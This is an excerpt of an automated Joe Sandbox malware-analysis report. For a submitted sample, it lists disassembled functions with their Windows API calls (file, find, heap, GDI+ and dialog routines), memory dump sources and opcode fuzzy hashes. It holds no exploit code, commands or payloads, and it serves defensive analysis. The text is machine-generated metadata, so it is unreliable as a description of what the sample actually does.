                                              • Instruction Fuzzy Hash: E5111975D10218DBCF04EFA8D989AEDB7F9FF49310F18042AE904F3280DB309A458B64
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00C9E3B1,?,?,00000000,?,?,00C9CC21,?), ref: 00C9E55F
                                              • GetLastError.KERNEL32 ref: 00C9E56E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 6b0d6237af2664b6612e873ac6d5d256d4e1aa90c887ef982e4928402e2a4545
                                              • Instruction ID: 0bc744f8bb021b9fb5f14ffa1218381483d1fcb59ffe4bcb2677972977d3f612
                                              • Opcode Fuzzy Hash: 6b0d6237af2664b6612e873ac6d5d256d4e1aa90c887ef982e4928402e2a4545
                                              • Instruction Fuzzy Hash: BA41F431604355CBCF24EFA5C98CBAEB3E5FB68720F14491DE89983641E770DD818BA1
                                              APIs
                                              • FlushFileBuffers.KERNEL32(?), ref: 00C9E78C
                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00C9E840
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$BuffersFlushTime
                                              • String ID:
                                              • API String ID: 1392018926-0
                                              • Opcode ID: 236ecab8819ffe04a8897fd3edc01b01bd6fa73ed9325f0442fddf118eaac3f2
                                              • Instruction ID: 3b966cf691051ead76d07482103dddf7936b3cf729d4e24fc4c97268e48c29f5
                                              • Opcode Fuzzy Hash: 236ecab8819ffe04a8897fd3edc01b01bd6fa73ed9325f0442fddf118eaac3f2
                                              • Instruction Fuzzy Hash: 7921E431249246EBCB14DEB4C899AABBBE8AFA5304F04491DF4D5C3141D329DA0DD762
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAFB52
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,00CE535C), ref: 00CAFC24
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileH_prolog3_Operation_wcslen
                                              • String ID:
                                              • API String ID: 3104323202-0
                                              • Opcode ID: 9f37c9cbf107ac79aeed10dcf2a109fc0e255a7d202b80e79fd773b1362a6f46
                                              • Instruction ID: cae4a0065869d8ebcbcf15efaea169ebc11a99e95ed48bda0048df7f797df156
                                              • Opcode Fuzzy Hash: 9f37c9cbf107ac79aeed10dcf2a109fc0e255a7d202b80e79fd773b1362a6f46
                                              • Instruction Fuzzy Hash: 80312771D0025D9EDF14DFE9C88ABDCBBB4BF09368F54012EE519A7191DB700A46DB20
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00C9E897
                                              • GetLastError.KERNEL32 ref: 00C9E8A4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 5d2bb714308d0ca875316252b92396f74180a2e112419d8068d9eca9c7a34362
                                              • Instruction ID: 3985fec55af9fcbfce64cc2cf0111d60f597db174f55d6d7dd2ca67b2737bdcf
                                              • Opcode Fuzzy Hash: 5d2bb714308d0ca875316252b92396f74180a2e112419d8068d9eca9c7a34362
                                              • Instruction Fuzzy Hash: 97110830600600AFEF34D6ADCC48B6673E9EB55370F500729E162925D0D7B0FE45D768
                                              APIs
                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00CB3C82
                                              • _wcslen.LIBCMT ref: 00CB3C99
                                                • Part of subcall function 00CA6A89: _wcslen.LIBCMT ref: 00CA6AA6
                                                • Part of subcall function 00C9B03D: __EH_prolog3_GS.LIBCMT ref: 00C9B044
                                                • Part of subcall function 00C9B3E1: __EH_prolog3_GS.LIBCMT ref: 00C9B3E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                              • String ID:
                                              • API String ID: 1265872803-0
                                              • Opcode ID: 3cc8bbb9989367375e582bab2666e31b8910f2d5d21112abe16cb1bb321c4a54
                                              • Instruction ID: fe5742caaf62ac6b5db4b97ccbde630fbff095be5b55804a251a789e3d4136e7
                                              • Opcode Fuzzy Hash: 3cc8bbb9989367375e582bab2666e31b8910f2d5d21112abe16cb1bb321c4a54
                                              • Instruction Fuzzy Hash: CA11A9759416D0AECF14EB64AD95BDC7BB4AB15318F0441AEE4449F293CB700A44E7A1
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C91CE9
                                              • GetDlgItem.USER32(?,?), ref: 00C91D01
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_Item_wcslen
                                              • String ID:
                                              • API String ID: 896027972-0
                                              • Opcode ID: 659bf500a557c2e702605568b8ed35d2715717d9734300ee2a4a8d25d1910f44
                                              • Instruction ID: a8891b3ff300756101138540229fb690a60a912fde9b4d22e616be90644fc777
                                              • Opcode Fuzzy Hash: 659bf500a557c2e702605568b8ed35d2715717d9734300ee2a4a8d25d1910f44
                                              • Instruction Fuzzy Hash: BE0171726002159EDB25AF64C88BBEDB7E8AF54350F48010AFC16A71D1CB709A41D710
                                              APIs
                                              • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00CA76EA,00CA0B6F), ref: 00CA76B4
                                              • GetProcessAffinityMask.KERNEL32(00000000,?,00CA76EA), ref: 00CA76BB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: b52bb84c5af7ea68fc775621ac060e1aba66292e26f1bd5d219119da78b33388
                                              • Instruction ID: fda61311339ddcdefa45cbec751055f331274b8383790432ce215cbc28627205
                                              • Opcode Fuzzy Hash: b52bb84c5af7ea68fc775621ac060e1aba66292e26f1bd5d219119da78b33388
                                              • Instruction Fuzzy Hash: E4E09232F14907A78F1987ADDC05BAF72ADBA452483184279F423D3100E974DE0146A0
                                              APIs
                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00CC9B73,000000FF), ref: 00CAF578
                                              • CoUninitialize.COMBASE(?,?,?,?,00CC9B73,000000FF), ref: 00CAF57D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: GdiplusShutdownUninitialize
                                              • String ID:
                                              • API String ID: 3856339756-0
                                              • Opcode ID: ff477342cf51172ee6dea1d41e66c54338ba39df872d4e84b73a3b519be89767
                                              • Instruction ID: 95051815438fe6df651c816576ba50b4c0832839adafe9e969680211bfc8d718
                                              • Opcode Fuzzy Hash: ff477342cf51172ee6dea1d41e66c54338ba39df872d4e84b73a3b519be89767
                                              • Instruction Fuzzy Hash: DAF05E76A04A44AFC711DF59EC85F8EBBA8FB48760F00422AF516C3760CB74A800CA90
                                              APIs
                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAE86A
                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CAE871
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: BitmapCreateFromGdipStream
                                              • String ID:
                                              • API String ID: 1918208029-0
                                              • Opcode ID: 092490c08f79b783721cce5b431196c1b1602fac517d6f8682c2b75b3c32682e
                                              • Instruction ID: 97fb779c31f36732e67b37b10ac1c8836d357df3368e19790b0b25c2a5b7b1a5
                                              • Opcode Fuzzy Hash: 092490c08f79b783721cce5b431196c1b1602fac517d6f8682c2b75b3c32682e
                                              • Instruction Fuzzy Hash: E2E09271800218EFCB10DF49C801BDDB7F8EB05354F20805AF88593741E674AF00EB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemShowWindow
                                              • String ID:
                                              • API String ID: 3351165006-0
                                              • Opcode ID: 414490400f2c19eba17a178ac2a461a24ad7fc7c73c5a3a0eaebbc1847df071d
                                              • Instruction ID: 68f17762adc21d2a5db2e74f55e49eb5ab12c6c661fe0677a5ef7fa2ada54258
                                              • Opcode Fuzzy Hash: 414490400f2c19eba17a178ac2a461a24ad7fc7c73c5a3a0eaebbc1847df071d
                                              • Instruction Fuzzy Hash: FFC0123205C380BECB010BB0DC09F2EBBA8ABA6212F00CA08F0A9C0060C23DC010DB11
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00C91CD2
                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00C91CD9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherItemUser
                                              • String ID:
                                              • API String ID: 4250310104-0
                                              • Opcode ID: eb6039097db46d708e968dec72b8c6828118a0e0d47ba2286a818421ef1a5493
                                              • Instruction ID: e32a0f2df17af3d2f4e29c8f50e30b92d48d9f5d8dd71f5d7a006cf13820f474
                                              • Opcode Fuzzy Hash: eb6039097db46d708e968dec72b8c6828118a0e0d47ba2286a818421ef1a5493
                                              • Instruction Fuzzy Hash: AAC04C7640C380BFCB015BA09D5CE2FBFA9AB95311F00CA49F5A984120C6358410DB11
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 6e9bd8e2c0278d9596f709b8f314cbd24995f36ed418d2679f7d9c8f3dd80a73
                                              • Instruction ID: 32e85a7106c0eab11c931ce8e57e90e9803ebe44cc345d8de0ca1e0988b04b28
                                              • Opcode Fuzzy Hash: 6e9bd8e2c0278d9596f709b8f314cbd24995f36ed418d2679f7d9c8f3dd80a73
                                              • Instruction Fuzzy Hash: 3AC18F31A04255ABDF25DF64C8D8BED7BE4AF05310F1800B9EC9ADF296C7349A45CBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 172c65c105d6320b72a46eb17479de53db41064bed89303071dfeb1d0498781f
                                              • Instruction ID: a0d4a735d0f10c675dd78ba4fee321bddd02f7a152630aa4957e971497f32c36
                                              • Opcode Fuzzy Hash: 172c65c105d6320b72a46eb17479de53db41064bed89303071dfeb1d0498781f
                                              • Instruction Fuzzy Hash: B68129719043168FDB24EF68C887B9EB7E4FF46308F04092EF96597281EBB49A44C791
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00C920B7
                                                • Part of subcall function 00C980EC: __EH_prolog3.LIBCMT ref: 00C980F3
                                                • Part of subcall function 00CA2815: __EH_prolog3.LIBCMT ref: 00CA281C
                                                • Part of subcall function 00C976E7: __EH_prolog3.LIBCMT ref: 00C976EE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 95b337ee719c712a25dc51abdef608a948ce2255d82b9aaef6a2b7765c6878fa
                                              • Instruction ID: 890f929935a92db3bbb60219f72609ea68c9b07fd730e6bf3fa17cbcedf3af6a
                                              • Opcode Fuzzy Hash: 95b337ee719c712a25dc51abdef608a948ce2255d82b9aaef6a2b7765c6878fa
                                              • Instruction Fuzzy Hash: F651F3B5A057808EDB44DF2A85847C9BBE0AF99300F0882BEDC4DDE69BDB740254DB61
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9B3E8
                                                • Part of subcall function 00C9F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?,?,?,?), ref: 00C9F739
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseFindH_prolog3_
                                              • String ID:
                                              • API String ID: 2672038326-0
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C92C37
                                                • Part of subcall function 00CA880E: __EH_prolog3.LIBCMT ref: 00CA8815
                                              Similarity
                                              • API ID: H_prolog3H_prolog3_
                                              • String ID:
                                              • API String ID: 3355343447-0
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00C976EE
                                                • Part of subcall function 00CA4F2B: __EH_prolog3.LIBCMT ref: 00CA4F32
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              APIs
                                                • Part of subcall function 00CC1DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC00BA,00000001,00000364,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E), ref: 00CC1E27
                                              • _free.LIBCMT ref: 00CC3195
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC00BA,00000001,00000364,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E), ref: 00CC1E27
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              APIs
                                                • Part of subcall function 00C9F826: __EH_prolog3_GS.LIBCMT ref: 00C9F830
                                                • Part of subcall function 00C9F826: FindFirstFileW.KERNELBASE(?,?,00000274,00C9F733,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?), ref: 00C9F859
                                                • Part of subcall function 00C9F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F8A4
                                                • Part of subcall function 00C9F826: GetLastError.KERNEL32(?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049,?,00000000), ref: 00C9F902
                                              • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?,?,?,?), ref: 00C9F739
                                              Similarity
                                              • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                              • String ID:
                                              • API String ID: 765066492-0
                                              APIs
                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00CA742D
                                              Similarity
                                              • API ID: ExecutionStateThread
                                              • String ID:
                                              • API String ID: 2211380416-0
                                              APIs
                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C91206
                                              Similarity
                                              • API ID: Concurrency::cancel_current_task
                                              • String ID:
                                              • API String ID: 118556049-0
                                              APIs
                                              • GdipAlloc.GDIPLUS(00000010), ref: 00CAEB0C
                                                • Part of subcall function 00CAE849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAE86A
                                              Similarity
                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                              • String ID:
                                              • API String ID: 1915507550-0
                                              APIs
                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00CB4256
                                                • Part of subcall function 00CB0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB0689
                                                • Part of subcall function 00CB0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB069A
                                                • Part of subcall function 00CB0678: IsDialogMessageW.USER32(00010464,?), ref: 00CB06AE
                                                • Part of subcall function 00CB0678: TranslateMessage.USER32(?), ref: 00CB06BC
                                                • Part of subcall function 00CB0678: DispatchMessageW.USER32(?), ref: 00CB06C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                              • String ID:
                                              • API String ID: 897784432-0
                                              • Opcode ID: d8b796aec95d5e4201cdd266d40e1ca62cc1f3b3d63ce840d66ee4fa6933060b
                                              • Instruction ID: 52594495d22ceb1cdc333f8e712491853bc3b799df1797300d74e9f1c1eb184f
                                              • Opcode Fuzzy Hash: d8b796aec95d5e4201cdd266d40e1ca62cc1f3b3d63ce840d66ee4fa6933060b
                                              • Instruction Fuzzy Hash: 96D09E31144200AAD6122B51CE06F0E7AE2AB98B09F004654B745740F1C6629E31AB16
                                              APIs
                                                • Part of subcall function 00CB4DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00CB4DF2
                                              • DloadProtectSection.DELAYIMP ref: 00CB4D54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AcquireDloadExclusiveLockProtectSection
                                              • String ID:
                                              • API String ID: 3680172570-0
                                              • Opcode ID: 567bc3bcc64e748589e43fe3e1d2558cc30a1d69065891aba3505837e4ec89df
